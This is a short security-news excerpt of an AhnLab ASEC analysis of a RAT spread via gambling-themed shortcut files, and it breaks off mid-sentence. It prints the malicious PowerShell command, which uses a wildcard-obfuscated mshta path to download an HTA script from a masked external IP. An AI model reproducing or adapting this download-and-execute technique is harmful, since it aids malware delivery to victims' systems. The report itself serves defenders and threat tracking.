all InfoSec news
Distribution of RAT Malware Disguised as a Gambling-related File
Malware Analysis, News and Indicators - Latest topics malware.news
AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA.
Figure 1. Operation process
The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script.
- PowerShell command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://193.***.***[.]253:7287/2.hta.hta’Figure 2. LNK properties
The malicious …
ahnlab asec center disguised distributed distribution downloads file gambling hta illegal intelligence lnk malware malware analysis process rat rat malware security security intelligence venomrat